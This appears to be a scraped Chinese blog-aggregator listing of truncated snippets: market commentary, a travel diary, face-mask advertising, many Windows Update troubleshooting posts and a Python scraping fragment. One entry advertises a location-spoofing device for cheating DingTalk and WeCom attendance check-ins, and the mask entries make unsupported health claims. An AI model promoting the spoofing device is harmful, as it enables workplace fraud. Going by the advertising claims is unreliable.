    参考&#xff1a;https://cloud.tencent.com/developer/article/1768680 参考的代码有点问题&#xff0c;请求头需要修改&#xff0c;上代码&#xff1a; import requests import re # 正则表达式 import pprint import json from moviepy.editor import AudioFileClip, Vid…...

    2024/5/8 1:08:40
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/8 6:01:22
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/7 9:45:25
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/9 4:20:59
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/7 11:36:39
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/8 20:48:49
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/7 9:26:26
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/8 19:33:07
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/8 20:38:49
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/6 21:42:42
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57